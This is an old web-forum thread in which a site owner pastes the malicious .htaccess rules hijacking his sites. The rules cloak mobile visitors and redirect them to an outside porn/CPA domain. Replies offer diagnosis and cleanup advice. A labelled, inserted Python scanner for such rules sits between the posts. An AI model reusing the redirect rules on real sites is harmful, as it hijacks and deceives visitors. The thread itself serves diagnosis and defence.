
Help: weird virus has dominated all my sites

Discussion in 'Blogging' started by Bestcreaters, Dec 19, 2014.

  1. Bestcreaters

    Code:
    RewriteEngine on
    
    RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} opera\ mini [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} blackberry [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} (pre\/|palm\ os|palm|hiptop|avantgo|plucker|xiino|blazer|elaine) [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} (iris|3g_t|windows\ ce|opera\ mobi|windows\ ce;\ smartphone;|windows\ ce;\ iemobile) [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} (mini\ 9.5|vx1000|lge\ |m800|e860|u940|ux840|compal|wireless|\ mobi|ahong|lg380|lgku|lgu900|lg210|lg47|lg920|lg840|lg370|sam-r|mg50|s55|g83|t66|vx400|mk99|d615|d763|el370|sl900|mp500|samu3|samu4|vx10|xda_|samu5|samu6|samu7|samu9|a615|b832|m881|s920|n210|s700|c-810|_h797|mob-x|sk16d|848b|mowser|s580|r800|471x|v120|rim8|c500foma:|160x|x160|480x|x640|t503|w839|i250|sprint|w398samr810|m5252|c7100|mt126|x225|s5330|s820|htil-g1|fly\ v71|s302|-x113|novarra|k610i|-three|8325rc|8352rc|sanyo|vx54|c888|nx250|n120|mtk\ |c5588|s710|t880|c5005|i;458x|p404i|s210|c5100|teleca|s940|c500|s590|foma|samsu|vx8|vx9|a1000|_mms|myx|a700|gu1100|bc831|e300|ems100|me701|me702m-three|sd588|s800|8325rc|ac831|mw200|brew\ |d88|htc\/|htc_touch|355x|m50|km100|d736|p-9521|telco|sl74|ktouch|m4u\/|me702|8325rc|kddi|phone|lg\ |sonyericsson|samsung|240x|x320|vx10|nokia|sony\ cmd|motorola|up.browser|up.link|mmp|symbian|smartphone|midp|wap|vodafone|o2|pocket|mobile|treo) [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^(1207|3gso|4thp|501i|502i|503i|504i|505i|506i|6310|6590|770s|802s|a\ wa|acer|acs-|airn|alav|asus|attw|au-m|aur\ |aus\ |abac|acoo|aiko|alco|alca|amoi|anex|anny|anyw|aptu|arch|argo|bell|bird|bw-n|bw-u|beck|benq|bilb|blac|c55\/|cdm-|chtm|capi|cond|craw|dall|dbte|dc-s|dica|ds-d|ds12|dait|devi|dmob|doco|dopo|el49|erk0|esl8|ez40|ez60|ez70|ezos|ezze|elai|emul|eric|ezwa|fake|fly-|fly_|g-mo|g1\ u|g560|gf-5|grun|gene|go\.w|good|grad|hcit|hd-m|hd-p|hd-t|hei-|hp\ i|hpip|hs-c|htc\ |htc-|htca|htcg|htcp|htcs|htct|htc_|haie|hita|huaw|hutc|i-20|i-go|i-ma|i230|iac|iac-|iac\/|ig01|im1k|inno|iris|jata|java|kddi|kgt|kgt\/|kpt\ |kwc-|klon|lexi|lg\ g|lg-a|lg-b|lg-c|lg-d|lg-f|lg-g|lg-k|lg-l|lg-m|lg-o|lg-p|lg-s|lg-t|lg-u|lg-w|lg\/k|lg\/l|lg\/u|lg50|lg54|lge-|lge\/|lynx|leno|m1-w|m3ga|m50\/|maui|mc01|mc21|mcca|medi|meri|mio8|mioa|mo01|mo02|mode|modo|mot\ |mot-|mt50|mtp1|mtv\ |mate|maxo|merc|mits|mobi|motv|mozz|n100|n101|n102|n202|n203|n300|n302|n500|n502|n505|n700|n701|n710|nec-|nem-|newg|neon|netf|noki|nzph|o2\ x|o2-x|opwv|owg1|opti|oran|p800|pand|pg-1|pg-2|pg-3|pg-6|pg-8|pg-c|pg13|phil|pn-2|pt-g|palm|pana|pire|pock|pose|psio|qa-a|qc-2|qc-3|qc-5|qc-7|qc07|qc12|qc21|qc32|qc60|qci-|qwap|qtek|r380|r600|raks|rim9|rove|s55\/|sage|sams|sc01|sch-|scp-|sdk\/|se47|sec-|sec0|sec1|semc|sgh-|shar|sie-|sk-0|sl45|slid|smb3|smt5|sp01|sph-|spv\ |spv-|sy01|samm|sany|sava|scoo|send|siem|smar|smit|soft|sony|t-mo|t218|t250|t600|t610|t618|tcl-|tdg-|telm|tim-|ts70|tsm-|tsm3|tsm5|tx-9|tagt|talk|teli|topl|hiba|up\.b|upg1|utst|v400|v750|veri|vk-v|vk40|vk50|vk52|vk53|vm40|vx98|virg|vite|voda|vulc|w3c\ |w3c-|wapj|wapp|wapu|wapm|wig\ |wapi|wapr|wapv|wapy|wapa|waps|wapt|winc|winw|wonu|x700|xda2|xdag|yas-|your|zte-|zeto|acs-|alav|alca|amoi|aste|audi|avan|benq|bird|blac|blaz|brew|brvw|bumb|ccwa|cell|cldc|cmd-|dang|doco|eml2|eric|fetc|hipt|http|ibro|idea|ikom|inno|ipaq|jbro|jemu|java|jigs|kddi|keji|kyoc|kyok|leno|lg-c|lg-d|lg-g|lge-|libw|m-cr|maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|mywa|nec-|newt|nok6|noki|o2im|opwv|palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|rozo|sage|sama|sams|sany|sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo|teli|tim-|tosh|treo|tsm-|upg1|upsi|vk-v|voda|vx52|vx53|vx60|vx61|vx70|vx80|vx81|vx83|vx85|wap-|wapa|wapi|wapp|wapr|webc|whit|winw|wmlb|xda-) [NC,OR]
    RewriteCond %{HTTP:Accept} (text\/vnd\.wap\.wml|application\/vnd\.wap\.xhtml\+xml) [NC,OR]
    RewriteCond %{HTTP:Profile} .+ [NC,OR]
    RewriteCond %{HTTP:Wap-Profile} .+ [NC,OR]
    RewriteCond %{HTTP:x-wap-profile} .+ [NC,OR]
    RewriteCond %{HTTP:x-operamini-phone-ua} .+ [NC,OR]
    RewriteCond %{HTTP:x-wap-profile-diff} .+ [NC]
    
    
    RewriteCond %{HTTP_USER_AGENT} !^(Mozilla\/5\.0\ \(Linux;\ U;\ Android\ 2\.2;\ en-us;\ Nexus\ One\ Build/FRF91\)\ AppleWebKit\/533\.1\ \(KHTML,\ like\ Gecko\)\ Version\/4\.0\ Mobile\ Safari\/533\.1\ offline)$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !(windows\.nt|bsd|x11|unix|macos|macintosh|playstation|google|yandex|bot|libwww|msn|america|avant|download|fdm|maui|webmoney|windows-media-player) [NC]
    
    
    RewriteRule ^(.*)$ http://share-with-me.info/ [L,R=302]
    RewriteEngine On 
    RewriteCond %{SERVER_PORT} 80 
    RewriteRule ^(.*)$ https://www.mywebite.com/$1 [R,L]
    All my sites are redirecting to http://share-with-me.info, a porn landing page, and the code is in .htaccess. I deleted all the site files and started afresh, but it regenerates a new .htaccess with the same virus code every single day. I even changed to a new host, but the same thing happened. I have cleaned all suspicious files, but nothing. What should I do? Viewer discretion is advised: the following URL redirects to a porn site, so please only visit it if you are willing to analyze it to help solve this problem. I have altered my website link to www.mywebsite.com for privacy, and no, I am not using WordPress on most of my sites.
     
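An added example, not from the thread: a small Python check that parses an .htaccess file, flags every RewriteRule whose target is an off-site URL, and records whether the preceding RewriteCond lines gate it on mobile user-agent or WAP headers, the pattern of the injected block above. The sample input is a constructed, trimmed copy of those rules followed by the site's own HTTPS redirect; `allowed_hosts` is an assumed allowlist the operator supplies.

```python
import re
import sys
from urllib.parse import urlsplit

# Constructed sample: a trimmed copy of the injected rules from the post,
# followed by the site's own (legitimate) HTTP-to-HTTPS redirect.
SAMPLE_HTACCESS = """\
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR]
RewriteCond %{HTTP:x-wap-profile} .+ [NC]
RewriteCond %{HTTP_USER_AGENT} !(windows\\.nt|bsd|x11|google|bot) [NC]
RewriteRule ^(.*)$ http://share-with-me.info/ [L,R=302]
RewriteEngine On
RewriteCond %{SERVER_PORT} 80
RewriteRule ^(.*)$ https://www.mywebsite.com/$1 [R,L]
"""

# Tokens that indicate a condition is selecting mobile/WAP visitors (cloaking).
MOBILE_HINTS = re.compile(r"android|iphone|blackberry|opera.?mini|wap|mobi", re.I)


def find_suspicious_redirects(text, allowed_hosts):
    """Return (line_no, target_host, gated_on_mobile) for each off-site RewriteRule.

    RewriteCond lines apply to the next RewriteRule only, so they are collected
    until a RewriteRule consumes them, then the buffer is cleared.
    """
    findings = []
    pending_conds = []
    allowed = {h.lower() for h in allowed_hosts}
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if line.startswith("RewriteCond"):
            pending_conds.append(line)
        elif line.startswith("RewriteRule"):
            parts = line.split()
            if len(parts) >= 3 and "://" in parts[2]:
                host = urlsplit(parts[2]).hostname
                if host and host.lower() not in allowed:
                    gated = any(MOBILE_HINTS.search(c) for c in pending_conds)
                    findings.append((line_no, host, gated))
            pending_conds = []
    return findings


def scan_files(paths, allowed_hosts):
    """Run the check over real .htaccess files; returns {path: findings}."""
    results = {}
    for path in paths:
        with open(path, encoding="utf-8", errors="replace") as fh:
            results[path] = find_suspicious_redirects(fh.read(), allowed_hosts)
    return results
```

Run it against every .htaccess under the document root (for example `find /var/www -name .htaccess`) with your own hostnames in the allowlist; any hit that is gated on mobile hints is exactly the cloaked redirect described above.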
  2. Zwielicht

    You should put the warning before the link, not after it. Someone might get excited and click on it without reading the rest of your post.


    Anyway, so you said that you've tried deleting the entire website and changing the domain to start over, but every time you regenerate a new .htaccess file, the file is reinfected. I have a few questions for you:


    1. How long have you been having this problem?
    2. Where did you download your version of Wordpress?
    3. Have you contacted your host to see if your server is infected?

    Edit: I reread the original post and OP said that they already tried switching to a new host. Anyway, when you try to remove the code I highlighted below, does it just reappear?

    Code:
    RewriteRule ^(.*)$ http://share-with-me.info/ [L,R=302]
    RewriteEngine On 
    RewriteCond %{SERVER_PORT} 80 
    RewriteRule ^(.*)$ https://www.mywebite.com/$1 [R,L]
    
     
    Last edited: Dec 19, 2014
  3. peepin2me

    Wow. This sounds scary. Did you raise a ticket with your host? The tech support guys with most hosts are quite good and are usually able to identify the issue and suggest ways to fix it.
     
  4. Bestcreaters

    Yes, it does reappear. One very scary thing that shocked me: I added an addon domain on my server for one of my clients to set up and work on a clone version of his site. Immediately after I finished working, which took about 4 hours, I copied the files to his website, and a day later his site got hijacked the same way. Now he is threatening to sue me; of course he won't believe I have nothing to do with it. Could the hacker be using a shell? I checked some stats on my traffic and saw a constant visitor from Russia, but I blocked that IP and changed my password. No FTP accounts, no second user. My host claims I am the only one on that server with the problem, but nothing. I am so scared, to be honest.
     
  5. onnelbro86

    was wondering, what attacker motif
     
  6. Bestcreaters

    Can you speak English, please?
     
  7. moromete

    My guess is that you have installed a nulled module/plugin that can overwrite the htaccess file. Am I right ?
     
  8. Zwielicht

    I'm not entirely sure what it is then. The best advice I can offer you right now is to start a "new" Wordpress website on a different host/server and install your SQL database and 1 file at a time until you find the problem file.
    He means, "I was wondering, what is the attacker's motive?".
     
  9. Bestcreaters

    To earn from the CPA landing page, of course.
     
  10. SharkServers

    First of all - is this a shared hosting account, or a VPS? That does make a difference, so it's good to know in order to try and help you. If it's a VPS, try putting each domain on a separate user account, clean the sites, and then see on which account the problem reappears. That way you will be able to identify the script that has security issues.
     
  11. bartosimpsonio

    Your server has been compromised. Trash it and move your site to a new one, this server will be forever compromised.
     